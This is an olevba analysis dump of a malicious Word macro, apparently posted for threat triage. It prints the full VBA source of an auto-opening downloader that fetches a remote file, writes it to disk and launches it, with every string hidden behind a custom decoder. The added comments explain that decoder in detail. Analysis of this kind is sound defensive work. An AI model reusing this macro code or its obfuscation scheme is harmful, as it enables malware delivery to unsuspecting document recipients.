
Malicious Word macro

dynamoo Apr 2nd, 2015 284 Never
  1. olevba 0.25 - http://decalage.info/python/oletools
  2. Flags       Filename                                                        
  3. ----------- -----------------------------------------------------------------
  4. OLE:MAS--B- 07623989.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: 07623989.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: 07623989.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Auto-run entry point. olevba's AutoExec row for this module reports that
  ' AutoOpen runs when the Word document is opened, so the call below is
  ' reached without any further user action once macros are allowed to run.
  ' NOTE(review): S6Wrk7025w4 is not defined in any module shown in this dump;
  ' the only parameterless Sub listed is LZHGWIJZGNT. Confirm against the
  ' original sample which procedure is actually invoked.
  15. Sub autoopen()
  16. S6Wrk7025w4
  17. End Sub
  18. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  19. ANALYSIS:
  20. +----------+----------+---------------------------------------+
  21. | Type     | Keyword  | Description                           |
  22. +----------+----------+---------------------------------------+
  23. | AutoExec | AutoOpen | Runs when the Word document is opened |
  24. +----------+----------+---------------------------------------+
  25. -------------------------------------------------------------------------------
  26. VBA MACRO dfsdfsdf.bas
  27. in file: 07623989.doc - OLE stream: u'Macros/VBA/dfsdfsdf'
  28. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  29.  
  ' Builds the two arguments for MQtf7O and calls it. Every string literal is
  ' stored encoded and recovered at run time by
  ' h08Nt7g80a0OJNSxSH__54e(encoded, key), so no address or path appears in
  ' clear text in the macro source.
  '   1st argument: one decoded string. MQtf7O hands it to the request
  '                 object's Open call, so it is presumably the download
  '                 address.
  '   2nd argument: Environ(<decoded variable name>) joined to a decoded
  '                 suffix. MQtf7O opens this value For Binary and writes to
  '                 it, so it is a local file path under a directory taken
  '                 from the environment.
  ' NOTE(review): the encoded literals are shown as the paste rendered them
  ' and may not be byte-accurate; recover the values from the original
  ' document in an isolated analysis environment, not from this text.
  30. Sub LZHGWIJZGNT()
  31.      MQtf7O h08Nt7g80a0OJNSxSH__54e("Ò¿¾ÊŠ‚z ƒxŽ‡ƒ¡y{ƒšƒz‰²Í|Ѿƒ‰»´¹Ý»xÄÀº", "jKJZPSKi"), Environ(h08Nt7g80a0OJNSxSH__54e("¡¶¼§", "MqoWLfWN")) & h08Nt7g80a0OJNSxSH__54e("½Þ¸º»¬Î×Ѻ‚­ÀÍ", "akTTHHhq")
  32. End Sub
  33. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  34. ANALYSIS:
  35. +------------+----------------+-----------------------------------------+
  36. | Type       | Keyword        | Description                             |
  37. +------------+----------------+-----------------------------------------+
  38. | Suspicious | Environ        | May read system environment variables   |
  39. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  40. |            |                | may be used to obfuscate strings        |
  41. |            |                | (option --decode to see all)            |
  42. +------------+----------------+-----------------------------------------+
  43. -------------------------------------------------------------------------------
  44. VBA MACRO sdfsdfggg.bas
  45. in file: 07623989.doc - OLE stream: u'Macros/VBA/sdfsdfggg'
  46. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  ' Fetch-write-open routine. It requests the address given in the first
  ' parameter, writes the raw response bytes to the path given in the second
  ' parameter, and then calls Open on a second object with a path built from
  ' an environment variable.
  ' Both object ProgIDs, the request verb, the Send argument and the final
  ' path exist only as encoded literals, so the notes below describe the call
  ' shapes visible here and hedge everything that depends on decoded values.
  ' The function is declared As Boolean but never assigns its return value,
  ' so callers always receive the default (False).
  ' Triage view, if the inferences below hold: expect an outbound HTTP request
  ' from the Office process, a new file under an environment-derived
  ' directory, and a follow-on open or launch of a file from such a directory.
  47. Function MQtf7O(ByVal ãÏÐÃìðâûàï As String, ByVal øÐÃèâûàûâàï As String) As Boolean
  ' The first Long declared below is never used in this function; the second
  ' holds the file number and the Byte array holds the response body.
  48.      Dim øÏíãìûâãàÀ As Object, äØÙÐãîøâûàà As Long, ùÈÎÐâûàààà As Long, ðãÏÈÃÈÐâààà() As Byte
  49.  
  ' Late-bound object whose ProgID is decoded at run time. The members used
  ' (Open with three arguments, Send, responseBody) match an HTTP request
  ' object; the trailing False is presumably the async flag, making the call
  ' blocking. TODO confirm from the decoded ProgID.
  50.     Set øÏíãìûâãàÀ = CreateObject(h08Nt7g80a0OJNSxSH__54e("¦¨œž¼£€¹¢™ÄÅ¢", "YUDQpqRa"))
  51.     øÏíãìûâãàÀ.Open h08Nt7g80a0OJNSxSH__54e("´”½", "mOiNlEdE"), ãÏÐÃìðâûàï, False
  52.     øÏíãìûâãàÀ.Send h08Nt7g80a0OJNSxSH__54e("…", "PJbKhRbh")
  53.  
  ' The response is taken as raw bytes; nothing here checks the status or
  ' the content before it is written out.
  54.     ðãÏÈÃÈÐâààà = øÏíãìûâãàÀ.responseBody
  55.  
  ' Write the bytes unchanged to the caller-supplied path using VBA's native
  ' binary file I/O (FreeFile / Open For Binary / Put / Close).
  56.     ùÈÎÐâûàààà = FreeFile
  57.     Open øÐÃèâûàûâàï For Binary As #ùÈÎÐâûàààà
  58.     Put #ùÈÎÐâûàààà, , ðãÏÈÃÈÐâààà
  59.     Close #ùÈÎÐâûàààà
  60.    
  ' Second late-bound object, again with an encoded ProgID. Its Open method is
  ' called with Environ(<decoded name>) & <decoded suffix>.
  ' NOTE(review): presumably this opens or launches the file written above,
  ' but the path is rebuilt from separate literals with different keys rather
  ' than reusing the second parameter, so the match is unconfirmed.
  61.     Dim îðÈÃãèðââà
  62. Set îðÈÃãèðââà = CreateObject(h08Nt7g80a0OJNSxSH__54e("·Ø¬ÂÏ“¯¼à³¿ÆÆâÍßµ", "dpGVcenL"))
  63. îðÈÃãèðââà.Open Environ(h08Nt7g80a0OJNSxSH__54e("›¯¹£", "GjlSYrAo")) & h08Nt7g80a0OJNSxSH__54e("±‡†ƒ‰{‡†…ƒŠt²Í¶", "UQQPUFMT")
  64.  
  65.      
  66.  
  67. End Function
  68. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  69. ANALYSIS:
  70. +------------+----------------+-----------------------------------------+
  71. | Type       | Keyword        | Description                             |
  72. +------------+----------------+-----------------------------------------+
  73. | Suspicious | CreateObject   | May create an OLE object                |
  74. | Suspicious | Open           | May open a file                         |
  75. | Suspicious | Environ        | May read system environment variables   |
  76. | Suspicious | Put            | May write to a file (if combined with   |
  77. |            |                | Open)                                   |
  78. | Suspicious | Binary         | May read or write a binary file (if     |
  79. |            |                | combined with Open)                     |
  80. | Suspicious | Base64 Strings | Base64-encoded strings were detected,   |
  81. |            |                | may be used to obfuscate strings        |
  82. |            |                | (option --decode to see all)            |
  83. +------------+----------------+-----------------------------------------+
  84. -------------------------------------------------------------------------------
  85. VBA MACRO Module1.bas
  86. in file: 07623989.doc - OLE stream: u'Macros/VBA/Module1'
  87. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  88.  
  89.  
  ' String decoder called for every encoded literal in the other modules.
  '   lvFUAJ4O4Ww : encoded text
  '   HQ07        : key (every call site in this dump passes 8 characters)
  '   returns     : decoded string (no return type declared, so a Variant)
  ' Both inputs are converted to byte arrays with StrConv(..., vbFromUnicode),
  ' a key byte is subtracted from each data byte, and the result is converted
  ' back with StrConv(..., vbUnicode).
  ' This module uses none of the keywords olevba flags, so its ANALYSIS
  ' section reports nothing even though every hidden string passes through it.
  90. Public Function h08Nt7g80a0OJNSxSH__54e(ByVal lvFUAJ4O4Ww As String, ByVal HQ07 As String)
  91. Dim D1WW3_661OJL03d46MkaCZS() As Byte
  92. Dim AF8S1() As Byte
  ' Only the second name is typed As Integer; the first has no type clause and
  ' is therefore a Variant.
  93. Dim iKuNclvIQNbaO15, jbUlyOYaUaoVg84 As Integer
  ' Junk loop: the running sum is never read after the loop ends. Its only
  ' effect is 98 DoEvents calls; presumably padding or analysis noise.
  94. jbUlyOYaUaoVg84 = 3444
  95. For iKuNclvIQNbaO15 = 0 To 97
  96. jbUlyOYaUaoVg84 = jbUlyOYaUaoVg84 + iKuNclvIQNbaO15
  97. DoEvents
  98. Next iKuNclvIQNbaO15
  99.  
  100.  
  101. D1WW3_661OJL03d46MkaCZS = StrConv(lvFUAJ4O4Ww, vbFromUnicode)
  102. AF8S1 = StrConv(HQ07, vbFromUnicode)
  ' i is not declared in this function (an implicit Variant unless Option
  ' Explicit is set, which this dump does not show).
  103. For i = 0 To UBound(D1WW3_661OJL03d46MkaCZS)
  ' Within the key length, data byte i is paired with key byte i.
  104. If i <= UBound(AF8S1) Then
  105. D1WW3_661OJL03d46MkaCZS(i) = D1WW3_661OJL03d46MkaCZS(i) - AF8S1(i)
  106. Else
  ' Past the key length the index wraps on UBound(AF8S1), i.e. key length
  ' minus one, not key length. With an 8-byte key, positions 8 and up cycle
  ' through key bytes 1..6 then 0..6, and the last key byte is applied only
  ' at position 7. A triage decoder must reproduce this wrap to get the same
  ' output; a plain "Mod key length" will diverge from position 8 onward.
  ' NOTE(review): the subtraction is done on Byte values; presumably the
  ' encoder guarantees data >= key, since a negative result would not fit.
  107. D1WW3_661OJL03d46MkaCZS(i) = D1WW3_661OJL03d46MkaCZS(i) - AF8S1(i Mod UBound(AF8S1))
  108. End If
  109. Next i
  110. h08Nt7g80a0OJNSxSH__54e = StrConv(D1WW3_661OJL03d46MkaCZS, vbUnicode)
  111. End Function
  112. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  113. ANALYSIS:
  114. No suspicious keyword or IOC found.